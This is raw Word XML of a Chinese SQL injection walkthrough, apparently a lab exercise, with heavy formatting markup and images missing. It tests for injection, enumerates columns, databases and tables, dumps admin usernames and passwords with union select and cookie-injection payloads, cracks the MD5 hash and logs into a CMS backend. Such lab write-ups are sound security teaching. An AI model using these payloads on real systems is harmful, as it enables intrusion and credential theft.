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先判断是否有sql注入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1=1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692525"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3175"/>
            <wp:docPr id="19" name="图片 19" descr="F)(O[68%JCVY%)75)6S$8$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)(O[68%JCVY%)75)6S$8$R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And 1=2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704590"/>
            <wp:effectExtent l="0" t="0" r="7620" b="10160"/>
            <wp:docPr id="20" name="图片 20" descr="P}DI1D3`6}RI0W1A75C3T9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P}DI1D3`6}RI0W1A75C3T9N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可以确定该网站存在sql注入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接下来判断一共返回了多少列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865880"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1270"/>
            <wp:docPr id="31" name="图片 31" descr="%I1UY{~4JQGD0FDUU3LXX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%I1UY{~4JQGD0FDUU3LXXA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307840"/>
            <wp:effectExtent l="0" t="0" r="8255" b="16510"/>
            <wp:docPr id="32" name="图片 32" descr="Z%E{QBPIF3]P(NBM5DN]M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Z%E{QBPIF3]P(NBM5DN]M2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可知，一共返回两列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接下来判断显示位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883025"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="33" name="图片 33" descr="@`%0RQS}SYAS`%BY`YA2X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@`%0RQS}SYAS`%BY`YA2XG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可知显示位为2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接下来使用union select联合查询获取数据库名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398520"/>
            <wp:effectExtent l="0" t="0" r="5080" b="11430"/>
            <wp:docPr id="34" name="图片 34" descr="H7S5_3E315CS9[1T7I6I%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H7S5_3E315CS9[1T7I6I%J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可知已查出数据库名，并查出第一个数据库名为maoshe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接下来获取maoshe数据库表名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759835"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="35" name="图片 35" descr="JYUQSXOYO)`R`]0[(6TA[)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JYUQSXOYO)`R`]0[(6TA[)Q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可知已查出maoshe数据库中表名，查出第一个表名为admin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接下来要在admin中获取用户名和密码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592195"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="36" name="图片 36" descr=")V3~@T%)F(HJ_9KRCTR4B[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)V3~@T%)F(HJ_9KRCTR4B[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0x7e对应 ~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已获取到用户名与密码</w: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寻找形如“.asp?id=xx”类的带参数的URL。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去掉“id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。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清空浏览器地址栏，输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript:alert(document.cookie="id="+escape("171"));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”，按Enter键后弹出一个对话框，内容是“id=xx”，然后用原来的URL刷新页面，如果显示正常，说明应用使用Request("id")这种方式获取数据的。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19400"/>
            <wp:effectExtent l="0" t="0" r="635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4.重复上面的步骤，将常规SQL注入中的判断语句带入上面的URL：“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript:alert(document.cookie="id="+escape("171 and 1=1"));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”和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“javascript:alert(document.cookie="id="+escape("171 and 1=2"));”。和常规SQL注入一样，如果分别返回正常和不正常页面，则说明该应用存在注入漏洞，并可以进行cookie注入。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javascript:alert(document.cookie="id="+escape("171 and 1=1"));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4114800" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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rcRect l="18670" t="4796" r="3276" b="486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2215" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1270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rcRect r="11430" b="8989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javascript:alert(document.cookie="id="+escape("171 and 1=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"));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2763520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1778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5.使用常规注入语句进行注入即可。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Cookie注入判断位置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id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="1953260"/>
            <wp:effectExtent l="0" t="0" r="13970" b="889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知道位置后就可以通过Cookie注入得到username和password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635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这一串字符是md5，解码后是welcome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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库里边admin welcome南方cms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后台扫描得到后台管理地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4144645" cy="3052445"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1460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897380"/>
            <wp:effectExtent l="0" t="0" r="8890" b="762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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>登录得到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="985520"/>
            <wp:effectExtent l="0" t="0" r="6985" b="508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E0A079"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="12E0A07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3F56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2020-07-11T00:36:05Z</dcterms:created>
  <dc:creator>82041</dc:creator>
  <cp:lastModifiedBy>京华倦客</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-11T00:36:41Z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